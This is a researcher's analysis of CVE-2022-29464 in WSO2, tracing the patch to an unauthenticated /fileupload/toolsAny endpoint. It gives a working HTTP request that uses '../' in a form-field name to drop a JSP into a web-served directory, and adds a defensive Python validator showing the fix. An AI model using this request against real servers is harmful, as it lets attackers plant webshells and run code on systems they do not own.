Wso2_Vul_Analysis_cve_2022_29464

0x00 Official information

On Apr 20, I found that someone had posted a message on Twitter about CVE-2022-29464.
Actually, we can get a lot of information about this vulnerability from the WSO2 official website and the CVE website.

https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2021-1738

Obviously, it is an unrestricted arbitrary file upload vulnerability. I installed a test environment and analysed the patch, so that I could work out the real PoC by reverse engineering the fix.

https://github.com/wso2/product-apim/releases

0x01 Patch

https://github.com/wso2/carbon-kernel/pull/3152/files/13795df0a5b6a2206fd0338abfff057a7b99e1bb

There are two package files that have been modified.

  1. FileUploadService.java now uses the method verifyCanonicalDestination to verify the allowed file extensions.
  2. In package org.wso2.carbon.ui, the following files have been deleted, and the class AnyFileUploadExecHandler has been removed.
  • deleted
    JarZipUploadExecutor.java
    KeyStoreFileUploadExecutor.java
    ToolsAnyFileUploadExecutor.java
    ToolsFileUploadExecutor.java
  • modified
    AnyFileUploadExecHandler

This was the key information for me at that time.

0x02 Wrong Direction

At first, I thought that FileUploadService.java would be the trigger point for this vulnerability, because FileUploadService.java could be called through FileUploadService.wsdl. I spent a lot of time building my PoC this way.


As you can see, it didn't work: accessing that service required authorization.

0x03 Right Direction

When I went back to read the details of this vulnerability on the official website, I found that we were asked to add some rules to fix the bug.

That may be the key point of this vulnerability. I found the web path "/fileupload" in FileUploadExecutorManager.class.

I switched the wso2 server to debug mode with --debug, and then had to find the real API path for uploading files.

When I used the path "/fileupload/" + a random path, such as /fileupload/testtest, no file was created. When I used "/fileupload/" + "resource", the server returned an exception string.

While debugging to find out what happened inside, I found that the iterator returned a list of strings:

key,resource,anyFiles,...


The corresponding executor is selected by the key variable. That means that if we change the path to "/fileupload/toolsAny", ToolsAnyFileUploadExecutor.java will be called.

The directory is set to "../extra/..". Since we control the filename, "../" segments can be used to upload an arbitrary file to an arbitrary location.

Call stack:

parseRequest:347, FileUploadBase (org.apache.commons.fileupload)
parseRequest:220, AbstractFileUploadExecutor (org.wso2.carbon.ui.transports.fileupload)
parseRequest:152, AbstractFileUploadExecutor (org.wso2.carbon.ui.transports.fileupload)
executeGeneric:103, AbstractFileUploadExecutor (org.wso2.carbon.ui.transports.fileupload)
execute:436, FileUploadExecutorManager$CarbonXmlFileUploadExecHandler (org.wso2.carbon.ui.transports.fileupload)
startExec:320, FileUploadExecutorManager$FileUploadExecutionHandlerManager (org.wso2.carbon.ui.transports.fileupload)
execute:127, FileUploadExecutorManager (org.wso2.carbon.ui.transports.fileupload)
doPost:57, FileUploadServlet (org.wso2.carbon.ui.transports)

0x04 POC

POST /fileupload/toolsAny HTTP/1.1
Host: 127.0.0.1:9443
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------250033711231076532771336998311
Content-Length: 319
Connection: close
urn:uploadFiles
Upgrade-Insecure-Requests: 1

-----------------------------250033711231076532771336998311
Content-Disposition: form-data; name="../../../../repository/deployment/server/jaggeryapps/publisher/cmd.jsp";filename="cmd.jsp"
Content-Type: application/octet-stream

<% out.print("123"); %>
-----------------------------250033711231076532771336998311--
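To make the root cause and the fix concrete, here is an added example (not code from the post or from WSO2) that parses a multipart body modelled on the PoC above and applies the two checks the patch introduces: resolving the canonical destination of the upload and rejecting anything that lands outside the upload directory, then enforcing an extension allowlist. The upload root /opt/wso2/tmp/extra, the allowlist, the function names and the sample body are all assumptions made for the example; the real WSO2 values live in the patched FileUploadService and executor classes.

```python
import posixpath
from email.parser import BytesParser
from email.policy import default

# Assumed (hypothetical) upload root and extension allowlist; the real WSO2
# values are in the patched classes and are not on the page.
UPLOAD_ROOT = "/opt/wso2/tmp/extra"
ALLOWED_EXTENSIONS = {".jar", ".zip", ".jks", ".xml"}

# Constructed multipart body modelled on the PoC: the form-field *name*
# carries "../" segments and the filename is a JSP.
BOUNDARY = b"---------------------------250033711231076532771336998311"
SAMPLE_BODY = b"".join([
    b"--", BOUNDARY, b"\r\n",
    b'Content-Disposition: form-data; name="../../../../repository/deployment/',
    b'server/jaggeryapps/publisher/cmd.jsp"; filename="cmd.jsp"\r\n',
    b"Content-Type: application/octet-stream\r\n",
    b"\r\n",
    b'<% out.print("123"); %>\r\n',
    b"--", BOUNDARY, b"--\r\n",
])


def canonical_destination(root: str, field_name: str) -> str:
    """Resolve where the upload would land, collapsing '..' segments.

    posixpath.join discards `root` when field_name is absolute, so an
    absolute name is caught by the containment check just like '../'.
    """
    return posixpath.normpath(posixpath.join(root, field_name))


def validate_upload(root: str, field_name: str, filename: str):
    """Return (accepted, reason, destination) for one uploaded part."""
    root_norm = posixpath.normpath(root)
    dest = canonical_destination(root_norm, field_name)
    # The file must be strictly below the upload root after canonicalisation;
    # this is the containment check the vulnerable executors lacked.
    if not dest.startswith(root_norm + "/"):
        return False, "path escapes upload root", dest
    # Extension allowlist on both the resolved name and the declared filename.
    for candidate in (dest, filename):
        ext = posixpath.splitext(candidate)[1].lower()
        if ext not in ALLOWED_EXTENSIONS:
            return False, "extension not allowed", dest
    return True, "ok", dest


def inspect_multipart(body: bytes, boundary: bytes, root: str):
    """Parse a multipart/form-data body and validate every part.

    Returns a list of (field_name, filename, accepted, reason, destination).
    """
    raw = (b'Content-Type: multipart/form-data; boundary="' + boundary
           + b'"\r\n\r\n' + body)
    msg = BytesParser(policy=default).parsebytes(raw)
    results = []
    for part in msg.iter_parts():
        field_name = part.get_param("name", header="content-disposition") or ""
        filename = part.get_filename() or ""
        results.append((field_name, filename)
                       + validate_upload(root, field_name, filename))
    return results


if __name__ == "__main__":
    for result in inspect_multipart(SAMPLE_BODY, BOUNDARY, UPLOAD_ROOT):
        print(result)
```

The order of the checks matters: the path is canonicalised before the extension is looked at, so a name such as `a/../lib.jar` is accepted (it still resolves inside the root) while the PoC's name resolves to a path under /repository and is refused before any extension logic runs.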


0x05 Reference

https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2021-1738
https://github.com/wso2/carbon-kernel/pull/3152/files/13795df0a5b6a2206fd0338abfff057a7b99e1bb
https://twitter.com/vcslab/status/1516369262469738496

Author: JulianWu

Posted on: 2022-04-21

Updated on: 2023-01-12
